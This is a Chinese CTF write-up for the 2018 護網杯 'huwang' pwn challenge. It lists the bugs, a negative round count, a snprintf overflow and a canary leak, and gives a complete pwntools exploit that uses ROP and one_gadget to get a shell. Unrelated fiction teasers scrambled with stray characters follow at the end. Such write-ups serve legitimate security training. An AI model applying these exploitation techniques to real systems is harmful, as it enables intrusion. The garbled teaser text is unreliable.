護網(wǎng)杯_2018_huwang

看到這個題目就覺得有點眼熟, 后來發(fā)現(xiàn)就是國賽awd題目改了改. (可能就是北航把自己國賽出的題目改了一下吧....) 但是國賽的時候我也沒做出來.... 然后這次仍然沒做出來..... 看了天樞的wp(天樞的大佬們太強了orz) 發(fā)現(xiàn)原來漏洞這么明顯..... 看完wp發(fā)現(xiàn)six也可以算原題, 主辦方也太懶了吧....

經(jīng)過上次的Teaser Dragon CTF和這次的護網(wǎng)杯, 我深刻意識到我軟件構(gòu)造學(xué)的是多么的菜TAT, 上次的production里面的assert就是軟件構(gòu)造中的重要內(nèi)容, faststorge里面的abs()溢出如果test case那部分學(xué)的扎實的話也應(yīng)該想到的(極值嘛), 這次huwang這題就更過分了, 只要輸入個負數(shù)就能解決的問題, 愣是沒想到..... six那題其實多調(diào)試幾次應(yīng)該就能做出來了(肖神說的是: pwn題還是要多動態(tài)調(diào), 靜態(tài)看會漏掉很多點). 以后一定要多調(diào)試, 更要細心些, 把整個輸入空間都要想一想. 學(xué)以致用才行.

閑話少說, 開始復(fù)現(xiàn).

只有command = 666 時進入的函數(shù)有用
漏洞就3個點

  1. 加密次數(shù)可以輸-1, 然后程序會進入一個很長的循環(huán), 我們就可以關(guān)閉連接, 然后/tmp/secret里面的內(nèi)容就是空了
  2. snprintf函數(shù)返回值會大于0xff, 之后read會存在溢出.
  3. 輸入用戶名為25個字節(jié)的時候可以leak canary和棧地址

過程:

  1. 第一次連接使/tmp/secret為空
  2. 第二次連接:
    1. 輸入用戶名的長度為25(canary最低字節(jié)為'\x00'),
    2. 猜md5的時候輸入'\x00'*16的md5值
    3. leak canary 和 棧地址
    4. 輸入足夠長的字符串, 使得snprintf返回值足夠大
    5. 構(gòu)造payload, 先找一個gadget(pop rdi; ret), 得到libc地址
    6. 再次溢出跳轉(zhuǎn)到one_gadget

exp 如下:

from pwn import *
import md5

io = process('./huwang')
# libc = ELF('./')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')


ru = lambda x : io.recvuntil(x)
sn = lambda x : io.send(x)
rl = lambda   : io.recvline()
sl = lambda x : io.sendline(x)
rv = lambda x : io.recv(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)

# def secret(name = 'aaa'):

m = md5.new()
m.update('\x00'*16)
md5_zero = m.digest()

sla('>>', '666')
ru('name')
sn('a'*25)
# sla('name', 'a'*25)
sla('secret', 'y')
sla('rounds', '1')
ru('guess the md5')
sn(md5_zero)
ru('a'*25)
res = rl()
canary = u64('\x00' + res[:7])
log.info('canary: ' + hex(canary))
stack_addr = u64(res[7: 7+6] + '\x00\x00')
log.info('stack_addr: ' + hex(stack_addr))

old_rbp = stack_addr + (0x3b0 - 0x450)
piece = {
    0x108 : p64(canary),
    0x110 : p64(old_rbp)
}

bss_start = 0x603038
pop_rdi_ret = 0x401573

payload = fit(piece, filler = '\x00') + p64(pop_rdi_ret) + p64(stack_addr + 8) + p64(0x4010d4)

ru('What`s your occupation?')
sn('a' * 0xff)
ru('[Y/N]')
sn('Y')
sleep(0.1)
sn('Y')
sleep(0.1)
sn(payload)
ru("final pres")
rl()
libc = u64(rl()[:6] + '\x00\x00')
libc_base = libc - 0x20830
log.info('libc: ' + hex(libc))


one = 0x4526a
payload2 = fit(piece, filler = '\x00') + p64(libc_base + one)

sleep(0.3)
sn('Y')
sleep(0.3)
sn('Y')
sleep(0.3)
sn(payload2)
io.interactive()
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末桦踊,一起剝皮案震驚了整個濱河市椅野,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌籍胯,老刑警劉巖竟闪,帶你破解...
    沈念sama閱讀 217,185評論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異杖狼,居然都是意外死亡炼蛤,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,652評論 3 393
  • 文/潘曉璐 我一進店門蝶涩,熙熙樓的掌柜王于貴愁眉苦臉地迎上來理朋,“玉大人,你說我怎么就攤上這事绿聘≌蛔保” “怎么了?”我有些...
    開封第一講書人閱讀 163,524評論 0 353
  • 文/不壞的土叔 我叫張陵袜爪,是天一觀的道長八秃。 經(jīng)常有香客問我,道長鲜屏,這世上最難降的妖魔是什么烹看? 我笑而不...
    開封第一講書人閱讀 58,339評論 1 293
  • 正文 為了忘掉前任国拇,我火速辦了婚禮,結(jié)果婚禮上惯殊,老公的妹妹穿的比我還像新娘酱吝。我一直安慰自己,他們只是感情好土思,可當(dāng)我...
    茶點故事閱讀 67,387評論 6 391
  • 文/花漫 我一把揭開白布务热。 她就那樣靜靜地躺著,像睡著了一般己儒。 火紅的嫁衣襯著肌膚如雪崎岂。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,287評論 1 301
  • 那天闪湾,我揣著相機與錄音冲甘,去河邊找鬼。 笑死途样,一個胖子當(dāng)著我的面吹牛江醇,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播何暇,決...
    沈念sama閱讀 40,130評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼陶夜,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了裆站?” 一聲冷哼從身側(cè)響起条辟,我...
    開封第一講書人閱讀 38,985評論 0 275
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎遏插,沒想到半個月后捂贿,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,420評論 1 313
  • 正文 獨居荒郊野嶺守林人離奇死亡胳嘲,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,617評論 3 334
  • 正文 我和宋清朗相戀三年厂僧,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片了牛。...
    茶點故事閱讀 39,779評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡颜屠,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出鹰祸,到底是詐尸還是另有隱情甫窟,我是刑警寧澤,帶...
    沈念sama閱讀 35,477評論 5 345
  • 正文 年R本政府宣布蛙婴,位于F島的核電站粗井,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜浇衬,卻給世界環(huán)境...
    茶點故事閱讀 41,088評論 3 328
  • 文/蒙蒙 一懒构、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧耘擂,春花似錦胆剧、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,716評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽蚁阳。三九已至铃绒,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間韵吨,已是汗流浹背匿垄。 一陣腳步聲響...
    開封第一講書人閱讀 32,857評論 1 269
  • 我被黑心中介騙來泰國打工移宅, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留归粉,地道東北人。 一個月前我還...
    沈念sama閱讀 47,876評論 2 370
  • 正文 我出身青樓漏峰,卻偏偏與公主長得像糠悼,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子浅乔,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,700評論 2 354